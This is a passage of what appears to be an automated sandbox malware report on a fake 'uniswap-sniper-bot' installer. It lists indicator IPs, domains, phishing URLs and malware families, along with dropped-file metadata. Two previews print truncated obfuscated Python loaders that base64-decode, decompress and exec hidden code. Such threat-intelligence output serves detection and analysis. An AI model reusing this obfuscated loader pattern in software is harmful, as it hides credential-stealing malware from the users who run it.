104.17.24.14	Proforma.Invoice.Payment.$$.html	Get hash	malicious	Unknown	Browse	cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js
	http://vtaurl.com	Get hash	malicious	Unknown	Browse	cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/webfonts/fa-brands-400.woff2
	http://Voyages.CNTraveler.com	Get hash	malicious	Unknown	Browse	cdnjs.cloudflare.com/ajax/libs/ScrollMagic/2.0.5/plugins/animation.gsap.js
162.159.61.3	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	0Xp3q1l7De.exe	Get hash	malicious	Remcos	Browse
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
208.95.112.1	RICHIESTA D'OFFERTA.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	ip-api.com/line/?fields=hosting
	fat098765678900.bat.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	New Purchase Order Document for PO1136908 000 SE.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	OC. 4515924646.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	saiya.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	ip-api.com/line/?fields=hosting
	windxcmd.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	ip-api.com/line/?fields=hosting
	main.exe	Get hash	malicious	Blank Grabber, SilentXMRMiner, Xmrig	Browse	ip-api.com/json/?fields=225545
	_THALAT DEME DURUM.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	DESIGN LOGO.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	file.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	ip-api.com/line/?fields=hosting

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
chrome.cloudflare-dns.com	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	0Xp3q1l7De.exe	Get hash	malicious	Remcos	Browse	162.159.61.3
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
dualstack.python.map.fastly.net	Fw3icx4ZWB.exe	Get hash	malicious	Unknown	Browse	151.101.64.223
	file.exe	Get hash	malicious	Unknown	Browse	151.101.0.223
	file.exe	Get hash	malicious	Unknown	Browse	151.101.0.223
	file.exe	Get hash	malicious	Growtopia	Browse	151.101.0.223
	file.exe	Get hash	malicious	Unknown	Browse	151.101.0.223
	3Af7PybsUi.exe	Get hash	malicious	Unknown	Browse	151.101.0.223
	3Af7PybsUi.exe	Get hash	malicious	Unknown	Browse	151.101.128.223
	1bhYyrjyNk.vbs	Get hash	malicious	Unknown	Browse	146.75.116.223
	WQRNV7bMS5.vbs	Get hash	malicious	Unknown	Browse	146.75.116.223
	6L9vCf48mN.vbs	Get hash	malicious	Unknown	Browse	146.75.116.223
cdnjs.cloudflare.com	http://www.urbanerecycling.com	Get hash	malicious	HTMLPhisher, TechSupportScam	Browse	104.17.24.14
	http://nakheel.com.staffrecords-2024auaqc-iqodlfdhb.copypremium.com/?staffrecords/2024/=c2FiaWthLmFiaWRAbmFraGVlbC5jb20=	Get hash	malicious	Unknown	Browse	104.17.24.14
	Annual_Q4_Benefits_&_Bonus_for_Ed.riley#IyNURVhUTlVNUkFORE9NNDUjIw==.docx	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://vectaire.doclawfederal.com/uDLtT/	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	https://docs.zoom.us/doc/5mbYcD6lRBK5O3HcDEXhFA?from=email	Get hash	malicious	Unknown	Browse	104.17.25.14
	3e5cb809-f546-fb3c-b0e3-5de228b453ab.eml	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	3e5cb809-f546-fb3c-b0e3-5de228b453ab.eml	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	http://sharefileonline.com	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	http://sharefileonline.com	Get hash	malicious	Unknown	Browse	104.17.25.14

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	_Rmcgaughy_Sonicwall inc._Financial...2024-jxj9FL.svg	Get hash	malicious	Unknown	Browse	104.21.66.145
	_Rmcgaughy_Sonicwall inc._Financial...2024-jxj9FL.svg	Get hash	malicious	Unknown	Browse	172.67.205.48
	INV-0542.pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	172.67.177.134
	Evidence of copyright infringement (2).bat	Get hash	malicious	Unknown	Browse	104.21.81.137
	Evidence of copyright infringement.bat	Get hash	malicious	Unknown	Browse	172.67.189.157
	Compilation of videos and images protected by copyright.bat	Get hash	malicious	Unknown	Browse	104.21.81.137
	Verzameling van video's en afbeeldingen die beschermd zijn door auteursrecht (2).bat	Get hash	malicious	Unknown	Browse	104.21.81.137
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.7.169
TELE-ROM-ASstrAleeaPaciiBlB5Ap16RO	na.hta	Get hash	malicious	Metasploit	Browse	86.104.74.31
	g4nWvGoRNZ.exe	Get hash	malicious	Remcos	Browse	86.104.72.183
	5046511eb489387b7a835a990ea3b36b77185f3fad905511c4bce30aa654c60b_dump.exe	Get hash	malicious	Remcos	Browse	86.104.72.183
	aqB7l6kvXl.exe	Get hash	malicious	Remcos	Browse	86.104.72.183
	https://libidotechnexus.com/cdn-vs/cache.php	Get hash	malicious	Unknown	Browse	86.104.72.5
	v65EwoFOxj.exe	Get hash	malicious	Metasploit, Meterpreter	Browse	86.104.74.31
	HQuxVxuLV.ps1	Get hash	malicious	NetSupport RAT	Browse	86.104.72.157
	http://wsj.pm	Get hash	malicious	NetSupport RAT	Browse	86.104.72.157
	https://webex-install.com	Get hash	malicious	NetSupport RAT	Browse	86.104.72.157
CLOUDFLARENETUS	_Rmcgaughy_Sonicwall inc._Financial...2024-jxj9FL.svg	Get hash	malicious	Unknown	Browse	104.21.66.145
	_Rmcgaughy_Sonicwall inc._Financial...2024-jxj9FL.svg	Get hash	malicious	Unknown	Browse	172.67.205.48
	INV-0542.pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	172.67.177.134
	Evidence of copyright infringement (2).bat	Get hash	malicious	Unknown	Browse	104.21.81.137
	Evidence of copyright infringement.bat	Get hash	malicious	Unknown	Browse	172.67.189.157
	Compilation of videos and images protected by copyright.bat	Get hash	malicious	Unknown	Browse	104.21.81.137
	Verzameling van video's en afbeeldingen die beschermd zijn door auteursrecht (2).bat	Get hash	malicious	Unknown	Browse	104.21.81.137
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.7.169
TUT-ASUS	RICHIESTA D'OFFERTA.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	208.95.112.1
	fat098765678900.bat.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	New Purchase Order Document for PO1136908 000 SE.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	OC. 4515924646.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	saiya.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	windxcmd.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	main.exe	Get hash	malicious	Blank Grabber, SilentXMRMiner, Xmrig	Browse	208.95.112.1
	_THALAT DEME DURUM.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	DESIGN LOGO.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	file.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\.pyp\DLLs\_asyncio.pyd	J33WM5suMd.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	SecuriteInfo.com.FileRepMalware.3650.10061.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.FileRepMalware.3650.10061.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Python.Stealer.1251.28918.16642.exe	Get hash	malicious	Python Stealer	Browse
	SecuriteInfo.com.Python.Stealer.1251.28918.16642.exe	Get hash	malicious	Python Stealer	Browse
	SRT Toolkit (EU, Windows) v2023.10.24.exe	Get hash	malicious	Unknown	Browse
	patent.exe	Get hash	malicious	Unknown	Browse
	Disney [CHECKER] V3.2.exe	Get hash	malicious	AsyncRAT, StormKitty	Browse
	Crunchyroll [CHECKER 2023] V1.3.exe	Get hash	malicious	AsyncRAT, StormKitty	Browse

Process:	C:\Users\user\.pyp\python.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	223879
Entropy (8bit):	6.002080790608239
Encrypted:	false
SSDEEP:	6144:hSBBwYYRyyEd9qnxtVtVhUeCxNV/sY616Mmq:+Td9AxtThCxNVEL1DP
MD5:	5C4EA84F5EF7D3C8D4492B6C1C814092
SHA1:	E6E693DA49A8AD4119A32E6A4316C93604DD64D6
SHA-256:	EB4C43FD65706B6CC9D72215E49C6F21E939B0B182F860FAB9A5517EAB47D04D
SHA-512:	610D84F97C70614FB88C503FE76A90734C71BF4FA8D9707A744500675B3A29B69860BDDA7BA177CF3A0BC64CA9FF186E4FF01CEDFC1397FD894C7251EAD4EA3E
Malicious:	false
Preview:	_ = lambda __ : __import__('zlib').decompress(__import__('base64').b64decode(__[::-1]));exec((_)(b'KzfHVDw//+9zy36W/pkHdFW6IiCgwk6VC9tjfFpRVn9HvntxMIG4x4ZpEhtNSjY6bxPi3Sv4dY5dZvPLy0zhe7DBbdqZdeUL6PAB+eWrBTc+TIE5Wa1N3EP7KxsNOskt/H6dSOxrLv+XtXI8dly2U9PRc+Oumj4IW3EnQ+9eZdxYnOp1bhvfHZ6otdt958J3AEujLSNvn2oPTF3FEV7dvZpK84QZnGx2soUGJYLyl3nANVvDz+0+oG6zHKwozhwpJZd5npzMd4tr0x5uYPs42K1o2Qo/ilUop0OT5eCcZi3r2oQUxJ/tpNxY0FuxuApLwAU3vQvhC2IqC5Yz84f1ey0PEaCASmgIRS7DkADWeY3auR6U3DBgdQ2q/7gA5fp71LnVfpG5uQNXJHopIes0lmPm61Bux1lgkrLaZMOMSiH3hyw+17dbgd0lLjw5PBtxvxhOz5wY64BqVFJLj8jb9vnRSdxup4DODPnzF1C59Uq17eK7Sm8THpFGRRaU6tIC3461609KDcJfW3baRPjWTSnHqWVjlChTE/lQC4R+Vq/1x/hRuwWpSSeoj+dNk3EGYzlNNVmONyR8223u1th/rFZmM0xW6X1x1fBg1PfokxQVQdbD+hSuU3QfIb+teSd5T72QnLr4J2x4MTfHvyiBi0yYJ+m2g6L95XbmPF8HFzP7Hx/92OFhkRcMxOI3Yaq524SimMJOmzFvdtHoRDnkNTtG/pG9p8JpmP2bwsmM3QeCTjburzi+2+pTxWNBtHJAy/8gVjqcbFGpmv6nUNj9oJqge8tCJbckjMO7lVU1eLRPfM2N0pEJ/pRFqZeovnIU6TdqVFgaCIETgOwH+zjnhPw7NHe8hWzDT1ToMdNNCMqAMP1BKKc+V7z/1Bi/rUs8CU9cq

Process:	C:\Windows\System32\tar.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	63864
Entropy (8bit):	6.127647865641386
Encrypted:	false
SSDEEP:	1536:n2eoB+WKE4+0Ib1Qxh4XNnEapxIg5ni87SyjPxt:n2eo4pg0IpQxh4XBEapxIg5ndJxt
MD5:	47DE17275C73CFCDCE18ACE16CD4F355
SHA1:	5D6B9B1D4534EEAE0A3B72BFA359BB4818E4C86E
SHA-256:	D667822030BA160CD8770569AFEC2C029B5247CEAA401D9268FE98BBEA9E4C11
SHA-512:	E11637808DDAF14D0ABDB88A389E6947B16F272D97642312C99EC38BBCAF43E3594D8F89BC8699D769368704A81BC1F01EDFFA69AB736665C1C192AEED780C8F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: J33WM5suMd.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.FileRepMalware.3650.10061.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.FileRepMalware.3650.10061.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Python.Stealer.1251.28918.16642.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Python.Stealer.1251.28918.16642.exe, Detection: malicious, Browse Filename: SRT Toolkit (EU, Windows) v2023.10.24.exe, Detection: malicious, Browse Filename: patent.exe, Detection: malicious, Browse Filename: Disney [CHECKER] V3.2.exe, Detection: malicious, Browse Filename: Crunchyroll [CHECKER 2023] V1.3.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........./TF.A.F.A.F.A.O...D.A...@.D.A...D.J.A...E.N.A...B.E.A...@.E.A...@.D.A.F.@..A...L.G.A...A.G.A....G.A...C.G.A.RichF.A.................PE..d...Z..c.........." ...".R..........`................................................T....`.............................................P...`...d.......................x)..........`w..T........................... v..@............p...............................text....P.......R.................. ..`.rdata..~J...p...L...V..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

Process:	C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe
File Type:	ASCII text, with very long lines (5078)
Category:	dropped
Size (bytes):	5079
Entropy (8bit):	6.043533261643446
Encrypted:	false
SSDEEP:	96:1FUqusAROuFcjV8t1Mk0EkKTiprhJbha67u+Amrrr69j1aScpqZ8baIHh:PstEKLb0EkKTQrNasLAg8BaShMrHh
MD5:	2A8E4281213E4AAA485612F9DED261A2
SHA1:	6FBFE386F4C03E6EB926AF5FCD35C74BAA36307E
SHA-256:	BBF676979AFC011B0891906A6AAAF638E051A7DC63B84B0511F8ED2EA7E11167
SHA-512:	AB53432549E8B252AD88D9C8FEB636D19CDFC308C427BAFE2A9695EF273B78DB196CC74DA7B6218450CBF4F578BDE7B8CD52D521F2DBF360EA3E312555FE2C03
Malicious:	false
Preview:	_ = lambda __ : __import__('zlib').decompress(__import__('base64').b64decode(__[::-1]));exec((_)(b'==g0h9zwf4///9Txpsn/enw+8n62V0yxMv0+qWCHOX24vpt6wvqUWBaNQEs55LrzDBfQweD8AVEMYROcWudU/ta2qAhbq9/VqIJS9Hvs+EicHTXCgcWSoXIWG7LV5S2SQYwDHCBsZNx7R/rJpjyPhfWxaZ4Q3lt2J0t2UX6aa2UsIZDrTGfie3oFSvV/N7tckxtlC9HocE1D8UO4QgjAUuf5WzKj1RxdVSnrn4cpO92fXChUwCaqDSDmOvTm6KsRGjLuYaWA89jQJnLJyxa22Lao6XpkbzthASR1TV301UF1qdeghsbz/cYnWpPAu7oMIOVigUfdLqMObkyINf/iacLFaT7SwASTZiW1jh/z4fbW3EPKEraH1DyCxU95BwlGsZRziX1qoDJhJCKoieOUQzCfPoRcfia/IWZbvBsCBXEcZx+PZZst65PVrjoTL4gNHqrY9NmuK8sGWxhkPvNf5WhftL2PXaUvW5IfGpeOoqNYGg9vXu4ifkH07BWNEBhWmtwxvBHNADlVjbsMHg1LYvpvn4mvY8hY6AX8dbT/3Xwx0dmyNKQIzDj14LNBDwH34sjfS3tBPmorsAqcIckFH6BFyWlR6yciO9XRBaTu2t/fl2O6NCyZ+k/8/5dZ8MnY2msSTgO7793xJE5j8RJNgHvKtjN9Hbg2Z8+2x7dIBFlvmHceF0+dmcdu4p64MuaI2Q4NJH4dSVajp/jVVOP1Fz1B9vAaeHxlPx//EZ73zWe5axdNkGBEChmX2P5yXPU9VSCkSQsWpRSFIu441uYC6Fbe7aq+RYTNH+QIafh1+Emqfjr2ryRlyUNn1LfRsCU75bZYTxhqsdA5iEDsE6fUo1jVWAnT7x1LU3/ZC5F+3iZYNTGUBTkIN4q8963jGilx2d0wB

Process:	C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1096
Entropy (8bit):	5.13006727705212
Encrypted:	false
SSDEEP:	24:36DiJHxRHuyPP3GtIHw1Gg9QH+sUW8Ok4F+d1o36qjFD:36DiJzfPvGt7ICQH+sfIte36AFD
MD5:	4D42118D35941E0F664DDDBD83F633C5
SHA1:	2B21EC5F20FE961D15F2B58EFB1368E66D202E5C
SHA-256:	5154E165BD6C2CC0CFBCD8916498C7ABAB0497923BAFCD5CB07673FE8480087D
SHA-512:	3FFBBA2E4CD689F362378F6B0F6060571F57E228D3755BDD308283BE6CBBEF8C2E84BEB5FCF73E0C3C81CD944D01EE3FCF141733C4D8B3B0162E543E0B9F3E63
Malicious:	false
Preview:	Copyright (c) Electron contributors.Copyright (c) 2013-2020 GitHub Inc...Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the."Software"), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND.NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE.LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION.OF CONTRACT, TORT OR OTHERWISE, ARISIN

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Process:	C:\Windows\System32\curl.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	51476596
Entropy (8bit):	7.993454941705
Encrypted:	true
SSDEEP:	1572864:6mIiGkgmsKpC0Xn1OoG4JC6B9O1jPIaG7YiC2:Y0XHRB9OZJG7YiC2
MD5:	38D365898FD6ACBB4788E654E864922D
SHA1:	281C2F8060DD3F0B244AE2282C3D3D406F8DD458
SHA-256:	6A104F07AB6C5711B6BC8BF6FF956AB8CD597A388002A966E980C5EC9678B5B0
SHA-512:	AD29325EA5F2A9744206E3282EB26656AAA70D4F83BEAE79330AA69A947701905CB7F353F6CABCA663179D0AA1305B300995E575A011B813FC1B73E63AF21F2C
Malicious:	false
Preview:	PK........$..V.................pyp/PK...........V.................pyp/DLLs/PK........O..Uu...h"..`.4......pyp/DLLs/libcrypto-1_1.dll..X.K.....uc...Ult..b.....P.T..E=....;A...@l...~.....~...?........1.=3k.Z3.f.Zk..-.....C"....`.c.}.......C..R.v$?.kO.....u...w_..}..t..W/_?..........S....z.v.T$U...8....m.x.....f?.V<@....b^h.;.<...b.c.;.........z4.<S.?..Q......j^d..]<.o...A..]i...T....q\2C.E.....m..d.0....f...6...&G$0....I.?..k..ae.%.. .R.....Kv-j..5.!.@.Ce...a..P...Y..E..w~}..a..k0DD.2.....}.P,....!"./_......<g.E....^.I`........1:..P...{..[..X.\$..!. ."......X....,.;...............\.[l.6...hr.._..v...`....JX..p.(._...C..U.......u..U.w...7X...rU...<gx"w.Oa..[...9dpFC......G.8."7.p6Dz,Io.t......r&Cd....;.9."s..m.L.]...U.-Y.."..;."W5.`..8P.B...x.\...Y........+.r........l...s.Z.Z.&.T.z.....\.[zu..g.../E...I!4...X<.!...4.F.o...k..."....rnT..4D.,."K6e3D.v...[K...^.T$.n.9.D.m. .]......jX7.=...<....W.I...RI...B.>.2D&.../&..lK..........J.B..x...9.KbCd...b.

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.9999746906597995
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	uniswap-sniper-bot-with-gui Setup 1.0.0.exe
File size:	74'110'128 bytes
MD5:	48c179680e0b37d0262f7a402860b2a7
SHA1:	176b980270ebf5bcd3b0d1c855da42f0a92082e2
SHA256:	42595da250a90129217f1dea56bfbbd871b16ba5a3e63dc63dd5a44739d036b9
SHA512:	f6fa82a6591c6adf164aa389e4f1ddbc8b7f5cf3f87d1b87288047140bd666b42b166ff488067f103398cb0f9a36b70fe905303b1b571924e9bdd56fe0e1d4f6
SSDEEP:	1572864:T7HO9FQrdxqwga6/P9YZgvLGdnwL6slKs5yqU/sRA:TzO9a9r6/P9YmvLGdnwLplh5yqU/sRA
TLSH:	7CF7337623A3EB60CB0353FBC29D52A70082438599767A0399DC7C7D58EE1244DDEA7E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L......\.................h...8...@.

Entrypoint:	0x40338f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5C157F86 [Sat Dec 15 22:26:14 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b34f154ec913d2d2c435cbd644e91687

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8610	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x19f000	0x59a0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6627	0x6800	7618d4c0cd8bb67ea9595b4266b3a91f	False	0.6646259014423077	data	6.450282348506287	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x14a2	0x1600	eecac1fed9cc6b447d50940d178404d8	False	0.4405184659090909	data	5.025178929113415	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x70ff8	0x600	db8f31a08a2242d80c29e1f9500c6527	False	0.5182291666666666	data	4.037117731448378	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x7b000	0x124000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x19f000	0x59a0	0x5a00	08c4991250f5de79c45db0a010df751d	False	0.4971788194444444	data	5.4610253129803485	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x19f5c8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.7213883677298312
RT_ICON	0x1a0670	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2688, 256 important colors	English	United States	0.6751066098081023
RT_ICON	0x1a1518	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152, 256 important colors	English	United States	0.7851985559566786
RT_ICON	0x1a1dc0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320, 256 important colors	English	United States	0.6560693641618497
RT_ICON	0x1a2328	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.8031914893617021
RT_ICON	0x1a2790	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.3118279569892473
RT_ICON	0x1a2a78	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	United States	0.36824324324324326
RT_DIALOG	0x1a2ba0	0x202	data	English	United States	0.4085603112840467
RT_DIALOG	0x1a2da8	0xf8	data	English	United States	0.6290322580645161
RT_DIALOG	0x1a2ea0	0xee	data	English	United States	0.6260504201680672
RT_DIALOG	0x1a2f90	0x1fa	data	English	United States	0.40118577075098816
RT_DIALOG	0x1a3190	0xf0	data	English	United States	0.6666666666666666
RT_DIALOG	0x1a3280	0xe6	data	English	United States	0.6565217391304348
RT_DIALOG	0x1a3368	0x1ee	data	English	United States	0.38866396761133604
RT_DIALOG	0x1a3558	0xe4	data	English	United States	0.6447368421052632
RT_DIALOG	0x1a3640	0xda	data	English	United States	0.6422018348623854
RT_DIALOG	0x1a3720	0x1ee	data	English	United States	0.3866396761133603
RT_DIALOG	0x1a3910	0xe4	data	English	United States	0.6359649122807017
RT_DIALOG	0x1a39f8	0xda	data	English	United States	0.6376146788990825
RT_DIALOG	0x1a3ad8	0x1f2	data	English	United States	0.39759036144578314
RT_DIALOG	0x1a3cd0	0xe8	data	English	United States	0.6508620689655172
RT_DIALOG	0x1a3db8	0xde	data	English	United States	0.6486486486486487
RT_DIALOG	0x1a3e98	0x202	data	English	United States	0.42217898832684825
RT_DIALOG	0x1a40a0	0xf8	data	English	United States	0.6653225806451613
RT_DIALOG	0x1a4198	0xee	data	English	United States	0.6512605042016807
RT_GROUP_ICON	0x1a4288	0x68	data	English	United States	0.6634615384615384
RT_VERSION	0x1a42f0	0x284	data	English	United States	0.4922360248447205
RT_MANIFEST	0x1a4578	0x423	XML 1.0 document, ASCII text, with very long lines (1059), with no line terminators	English	United States	0.5127478753541076

DLL	Import
KERNEL32.dll	SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, 